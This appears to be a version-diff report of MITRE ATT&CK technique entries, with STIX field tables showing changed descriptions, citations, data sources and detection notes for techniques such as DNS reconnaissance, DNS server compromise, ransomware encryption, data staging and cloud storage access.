| description | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records) Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
| external_references[1]['source_name'] | DNS Dumpster | Circl Passive DNS |
| external_references[1]['description'] | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://dnsdumpster.com/ | https://www.circl.lu/services/passive-dns/ |
| external_references[2]['source_name'] | Circl Passive DNS | DNS Dumpster |
| external_references[2]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://www.circl.lu/services/passive-dns/ | https://dnsdumpster.com/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sean Metcalf Twitter DNS Records', 'description': 'Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.', 'url': 'https://twitter.com/PyroTek3/status/1126487227712921600/photo/1'} | |
| Old Description | New Description |
|---|---|
| Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 15:56:05.112000+00:00 | 2022-04-19 21:22:13.578000+00:00 |
| description | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) |
| external_references[1]['source_name'] | Talos DNSpionage Nov 2018 | FireEye DNS Hijack 2019 |
| external_references[1]['description'] | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html |
| external_references[2]['source_name'] | FireEye DNS Hijack 2019 | Crowdstrike DNS Hijack 2019 |
| external_references[2]['description'] | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. | Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html | https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/ |
| external_references[3]['source_name'] | CiscoAngler | Talos DNSpionage Nov 2018 |
| external_references[3]['description'] | Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017. | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. |
| external_references[3]['url'] | https://blogs.cisco.com/security/talos/angler-domain-shadowing | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html |
| external_references[4]['source_name'] | Proofpoint Domain Shadowing | CiscoAngler |
| external_references[4]['description'] | Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020. | Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017. |
| external_references[4]['url'] | https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows | https://blogs.cisco.com/security/talos/angler-domain-shadowing |
| x_mitre_data_sources[0] | Domain Name: Active DNS | Domain Name: Passive DNS |
| x_mitre_data_sources[1] | Domain Name: Passive DNS | Domain Name: Active DNS |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint Domain Shadowing', 'description': 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows'} | |
| Old Description | New Description |
|---|---|
| Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) |
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:07:27.119000+00:00 | 2022-06-16 13:07:10.318000+00:00 |
| description | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) |
| external_references[1]['source_name'] | US-CERT Ransomware 2016 | CarbonBlack Conti July 2020 |
| external_references[1]['description'] | US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019. | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA16-091A | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ |
| external_references[3]['source_name'] | US-CERT NotPetya 2017 | Rhino S3 Ransomware Part 1 |
| external_references[3]['description'] | US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019. | Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021. |
| external_references[3]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-181A | https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ |
| external_references[4]['source_name'] | US-CERT SamSam 2018 | NHS Digital Egregor Nov 2020 |
| external_references[4]['description'] | US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019. | NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020. |
| external_references[4]['url'] | https://www.us-cert.gov/ncas/alerts/AA18-337A | https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary |
| external_references[5]['source_name'] | Rhino S3 Ransomware Part 1 | US-CERT Ransomware 2016 |
| external_references[5]['description'] | Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021. | US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019. |
| external_references[5]['url'] | https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ | https://www.us-cert.gov/ncas/alerts/TA16-091A |
| x_mitre_data_sources[0] | Cloud Storage: Cloud Storage Metadata | File: File Creation |
| x_mitre_data_sources[1] | Cloud Storage: Cloud Storage Modification | File: File Modification |
| x_mitre_data_sources[2] | Process: Process Creation | Network Share: Network Share Access |
| x_mitre_data_sources[4] | File: File Modification | Cloud Storage: Cloud Storage Modification |
| x_mitre_data_sources[5] | File: File Creation | Process: Process Creation |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT NotPetya 2017', 'description': 'US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-181A'} | |
| external_references | {'source_name': 'US-CERT SamSam 2018', 'description': 'US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/AA18-337A'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_contributors | Harshal Tupsamudre, Qualys | |
| x_mitre_contributors | Travis Smith, Qualys | |
| x_mitre_contributors | ExtraHop | |
| Old Description | New Description |
|---|---|
| Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 14:04:16.371000+00:00 | 2022-04-19 23:03:02.016000+00:00 |
| description | Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| x_mitre_data_sources[0] | File: File Metadata | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Process: OS API Execution | File: File Deletion |
| x_mitre_data_sources[2] | File: File Creation | Process: OS API Execution |
| x_mitre_data_sources[3] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[4] | File: File Modification | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[5] | Network Traffic: Network Traffic Content | File: File Creation |
| x_mitre_data_sources[6] | Network Traffic: Network Traffic Flow | File: File Metadata |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017) In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:00.855000+00:00 | 2022-07-20 20:07:40.167000+00:00 |
| external_references[1]['source_name'] | PWC Cloud Hopper April 2017 | Mandiant M-Trends 2020 |
| external_references[1]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. |
| external_references[1]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf | https://content.fireeye.com/m-trends/rpt-m-trends-2020 |
| external_references[2]['source_name'] | Mandiant M-Trends 2020 | PWC Cloud Hopper April 2017 |
| external_references[2]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. |
| external_references[2]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf |
| x_mitre_data_sources[0] | File: File Access | File: File Creation |
| x_mitre_data_sources[1] | File: File Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_detection | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection. |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access | |
| Old Description | New Description |
|---|---|
| Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. | Adversaries may access data from improperly secured cloud storage. Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011) Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.374000+00:00 | 2022-10-18 19:10:42.621000+00:00 |
| name | Data from Cloud Storage Object | Data from Cloud Storage |
| description | Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. | Adversaries may access data from improperly secured cloud storage. Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011) Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects. |
| external_references[1]['source_name'] | Amazon S3 Security, 2019 | SecureWorld - How Secure Is Your Slack Channel - Dec 2021 |
